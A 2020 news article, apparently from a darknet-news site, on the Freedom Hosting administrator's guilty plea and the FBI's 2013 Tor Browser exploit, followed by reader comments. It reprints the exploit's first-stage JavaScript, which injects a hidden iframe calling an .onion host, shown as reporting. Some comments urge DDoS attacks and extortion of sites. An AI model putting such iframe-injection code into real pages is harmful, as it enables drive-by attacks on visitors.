Freedom Hosting Admin Admits Child Pornography Charges

Eric Eoin Marques, the creator and administrator of Freedom Hosting, pleaded guilty to conspiracy to advertise child pornography. Freedom Hosting, at its height, was the largest Tor webhost and the FBI called Marques “the largest facilitator of child porn on the planet.”

Marques admitted operating Freedom Hosting from between 2008 and 2013 until his arrest in Dublin, Ireland. Investigators learned that Marques had helped operate “criminal communities dedicated to the sexual exploitation of children.” He was not a “hands off” administrator and actively participated in the child exploitation forums hosted on Freedom Hosting.

Freedom Hosting homepage

Freedom Hosting homepage

Law enforcement in Ireland arrested Marques after a grand jury had returned an indictment charging him with the following crimes:

  • Conspiracy to Advertise Child Pornography
  • Conspiracy to Distribute Child Pornography
  • Advertising Child Pornography
  • Distribution of Child Pornography

An example of his active participation and acknowledgement of the illegal forums using Freedom Hosting:

On April 24, 2013, a user of Website A posted a message asking whether the anonymous hosting service (AHS) is free to the end user. On April 25, 2013, the administrator of Website A responded that the AHS is “100% free” and that the administrator assumes that “the admin covers [the cost] himself as a·service to the [Network] pedo community.”

Website A, in this instance, is a reference to one of the largest child exploitation forums at the time. In a similar thread, users of the forum talked about Marques’ additional involvement:

On May 31, 2013, the administrator of Website A replied to a user that claimed, “[AHS] has NO control of the sites it hosts. It only hosts them.” The administrator responded, stating, “In reality [AHS] has full control over all the websites hosted on their servers. In fact, just a few days ago they patched a few of the core files running this very forum.” Later in the same conversation, the administrator noted that, though AHS does not “create or maintain ( as far as I know) any of the sites they are hosting” AHS could “do whatever they wanted with the-sites they host as they inherently have full access to the databases behind the sites.”

Freedom Hosting, in total hosted more than 8.5 million images of child exploitation material, according to an announcement from the Department of Justice. (Marques had little to no involvement in the administration of the majority of the sites hosted by Freedom Hosting. The government focused entirely on child pornography crimes.)

After seizing Freedom Hosting servers, the FBI relaunched the service using servers under their control in Maryland.

FBI describes the operation in the criminal complaint

FBI describes the operation in the criminal complaint

On August 1, 2013, some savvy Tor users began noticing that the Freedom Hosting sites were serving a hidden “iframe”—a kind of website within a website. The iframe contained Javascript code that used a Firefox vulnerability to execute instructions on the victim’s computer. The code specifically targeted the version of Firefox used in the Tor Browser Bundle—the easiest way to use Tor.

The compromised server injected an iframe and then injected additional iframes with scripts that checked the vistor’s browser version (See CVE-2013-1690 for more information). If a user’s browser version met the requirements (Firefox 17 on Windows), it would download an infected payload that sent the target’s MAC address and Windows hostname to a server in Virginia controlled by the FBI. This exploit required the use of javascript. And the Tor Browser Bundle shipped with javascript enabled by default.

Below is the first indication that something was not right. The full code consists of multiple scripts and is far too long to embed here. Can check it out here though. Magneto

function createCookie(name,value,minutes) {
	if (minutes) {
		var date = new Date();
		var expires = "; expires="+date.toGMTString();
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
    	var c = ca[i];
    	while (c.charAt(0)==' ') c = c.substring(1,c.length);
    	if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    return null;

function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));

function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
    iframe.height = "5";
    iframe.width = "*";

function format_quick() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);

function isReady()
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {

        if ( isFF() ) {
        setTimeout(isReady, 250);
setTimeout(isReady, 250);

Marques is scheduled for sentencing on May 11, 2020. He faces a mandatory minimum sentence of 15 years in prison.

Previously: DOJ: Freedom Hosting Admin has been Extradited to the US

h/t @just_some_d00d

Do you really want to comment here? not rules
5fe38440 Fri, Feb 7, 2020

Sick people. Go offline on tor netwerk retards.

945853e0 Fri, Feb 7, 2020

and notihng of value was lost.

b9fa78c0 Fri, Feb 7, 2020

one more nasty piece of shit hits the bowl

7f3a0b60 Fri, Feb 7, 2020

i hope they catch the squaremarket admin too sick fucks

b9c8e3a0 Fri, Feb 7, 2020

can you show a comparison between what a site looks like normal and what a site looks like with iframe?

7334d450 Sat, Feb 8, 2020

CP aside, Freedom Hosting was a great service

3ffb3ea0 Sat, Feb 8, 2020


“i hope the catch the squaremarket admins too sick fucks”

What do you mean? How do know the admins of squaremarket and why are they sick fucks?

683bf570 Sat, Feb 8, 2020

Didn’t know hosting on Freedom Hosting was free. That’s cool… not cool CP was how it stayed afloat

f69a8020 Sat, Feb 8, 2020

WeAreAmsterdam is a scammer, unless of course they lost access to email. DO not order from them. Nothing shows.

3609fc60 Sat, Feb 8, 2020

squaremarket allowed cp for a long time that is why they were never listed on deepdotweb when it was still around and still not many sites list them

3609fc60 Sat, Feb 8, 2020

Law enforcement had seized DeepDotWeb long before Square Market launched. The market itself has not existed a “long time” yet.

f2aa9c20 Sat, Feb 8, 2020

15 years for this piece of shit is a joke, 150 years would not be long enough. Wish these other pieces of shit who DDOS the fuck out of these markets would target these Pedo Sites, surely they could extort the fuck out of them until they kill themselves, hopefully!

ce4f2c70 Sat, Feb 8, 2020

whack boy. CP rlly bad.

2c33ddb0 Sat, Feb 8, 2020

These guys need to all GO. It’s so disgusting how can you even get off on a young human like they aren’t even developed.

aea6b750 Sat, Feb 8, 2020

sick fucks he got only 15 years wtttttfffff!!!

32f55e90 Sun, Feb 9, 2020

fuck Ross for life, and he gets 15 years? fuck the American justice system

b964cd20 Sun, Feb 9, 2020

Do you guys not know what a mandatory minimum sentence is? 15 years is the MINIMUM he will serve. It’s highly unlikely the judge will give him the lightest sentence. This guys going away for life

f6ca3210 Sun, Feb 9, 2020

i just hope i can join these sick fucks in prison

New comments are disabled after ten days in an attempt to limit spam.